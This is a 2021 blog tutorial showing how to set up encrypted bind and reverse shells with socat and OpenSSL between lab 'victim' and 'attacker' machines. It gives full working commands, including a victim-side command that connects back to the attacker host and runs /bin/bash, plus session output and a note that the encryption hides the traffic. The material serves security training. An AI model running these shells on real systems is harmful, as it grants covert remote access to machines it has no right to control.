Saturday, January 23, 2021

Socat Encrypted Bind and Reverse shells

Encrypted Bind Shell

First we need to generate a new openssl key to use with our bind shell. 

Victim Box:
user@debian:~$ openssl req -newkey rsa:2048 -nodes -keyout bind.key -x509 -days 365 -out bind.crt
Generating a RSA private key
.......................................................+++++
..+++++
writing new private key to 'bind.key'
-----
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [AU]:
State or Province Name (full name) [Some-State]:
Locality Name (eg, city) []:
Organization Name (eg, company) [Internet Widgits Pty Ltd]:
Organizational Unit Name (eg, section) []:
Common Name (e.g. server FQDN or YOUR name) []:
Email Address []:
user@debian:~$ ls
bind.crt  bind.key
user@debian:~$

Once you create the 'crt' and 'key' files, you concatenate the two files into a resulting 'pem' file. This will be the file we will use in our bind shell command. 

user@debian:~$ cat bind.key bind.crt > bind.pem
user@debian:~$ ls
bind.crt  bind.key  bind.pem
user@debian:~$

Now that we have our 'pem' file created, we can move on to setting up the bindh shell listener. 

user@debian:~$ socat OPENSSL-LISTEN:8888,cert=bind.pem,verify=0,fork EXEC:/bin/bash

Once we have that listening, we move over to the attack box and issue the connect command. 

Attacker Box:
sam@ubuntu:~$ socat - OPENSSL:192.168.155.138:8888,verify=0
id
uid=1005(user) gid=1005(user) groups=1005(user)
whoami
user

If we look at the picture below of the wireshark output, we see that the traffic within the bind shell is encrypted.

Encrypted Reverse Shell

We first start off by generating a new key for our reverse shell. 

Attacker Box:
sam@ubuntu:~$ openssl req -newkey rsa:2048 -nodes -keyout rev.key -x509 -days 365 -out rev.crt
Generating a RSA private key
...................................................................................+++++
................+++++
writing new private key to 'rev.key'
-----
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [AU]:
State or Province Name (full name) [Some-State]:
Locality Name (eg, city) []:
Organization Name (eg, company) [Internet Widgits Pty Ltd]:
Organizational Unit Name (eg, section) []:
Common Name (e.g. server FQDN or YOUR name) []:
Email Address []:
sam@ubuntu:~$

After that we concatenate the two files into a 'pem' file. 

sam@ubuntu:~$ cat rev.key rev.crt > rev.pem

Once we have the 'pem' file created, we can setup the listener for the remote connection. 

sam@ubuntu:~$ socat -d -d OPENSSL-LISTEN:8888,cert=rev.pem,verify=0,fork STDOUT
2021/01/21 16:26:24 socat[14399] N listening on AF=2 0.0.0.0:8888

Now on the victim side, we issue the command below to connect back to our attacker box. 

Victim Box:
user@debian:~$ socat OPENSSL:192.168.155.129:8888,verify=0 EXEC:/bin/bash

Once we get a connect back the output will look like this: 

sam@ubuntu:~$ socat -d -d OPENSSL-LISTEN:8888,cert=rev.pem,verify=0,fork STDOUT
2021/01/21 16:26:24 socat[14399] N listening on AF=2 0.0.0.0:8888
2021/01/21 16:27:09 socat[14399] N accepting connection from AF=2 192.168.155.138:47334 on AF=2 192.168.155.129:8888
2021/01/21 16:27:09 socat[14399] N forked off child process 14401
2021/01/21 16:27:09 socat[14399] N listening on AF=2 0.0.0.0:8888
2021/01/21 16:27:09 socat[14401] N no peer certificate and no check
2021/01/21 16:27:09 socat[14401] N SSL connection using ECDHE-RSA-AES256-GCM-SHA384
2021/01/21 16:27:09 socat[14401] N SSL connection compression "none"
2021/01/21 16:27:09 socat[14401] N SSL connection expansion "none"
2021/01/21 16:27:09 socat[14401] N using stdout for reading and writing
2021/01/21 16:27:09 socat[14401] N starting data transfer loop with FDs [7,7] and [1,1]
id
uid=1005(user) gid=1005(user) groups=1005(user)
whoami
user

As we can see we got a connect back shell.

at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)

Exploiting Weak WEBDAV Configurations

The server we are going to audit has the following fingerprint. 80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2) Next we need t...

  • Exploring POP3 Servers
    Scanning the remote host We can use NMAP to scan the remote host and run enumeration scripts against the POP3 server. root@asus:~/unix% ...
  • Enumerating SMTP Servers with NMAP
    NMAP gives you the ability to enumerate SMTP service with some scripts from the NMAP Scripting Enigne. These scripts will produce some gene...
  • Enumerating SNMP Servers with NMAP
    NMAP gives you the ability to use scripts to enumerate and exploit remote host with the use of the NMAP Scripting Engine. Today we will be ...
  • Testing LDAP servers with examples
    Today we are going to be attacking the remote service LDAP. The only thing we need is an IP Address so lets ping our host to verify its up ...
  • Enumerating UNIX usernames
    Sometimes you may come across a situation where all you have from your OSINT phase is a list of first and last names. you can use pre-built...
  • Reading local files with XXE attacks
    Today we will be exploring XXE XML External Entity Attacks. A XXE attack is a attack that is brought against an application that deals with...
  • Attacking SMTP on Debian Linux
    First lets do a quick service scan against the remote host. root@asus:/mnt% nmap -sV -T4 -p22,25 mail.acme.com Starting Nmap 7.01 ( https:...
  • Attacking NFS
    This is our data set we will work from which was gathered during the OSINT phase from the company website: http://www.acme.com k.madden@m...
  • VulnHub: RickdiculouslyEasy Walkthrough
    Lets first start off with a nmap scan of the remote host. root@ubuntu:~# nmap -p0-65355 -sV -O -sC -T5 192.168.0.48 Starting Nmap 7.60 (...
  • Exploring IMAP Servers
    Scanning the Remote Host We can use NMAP to scan the remote IMAP server and run enumeration scripts agaisnt it to see what all the server i...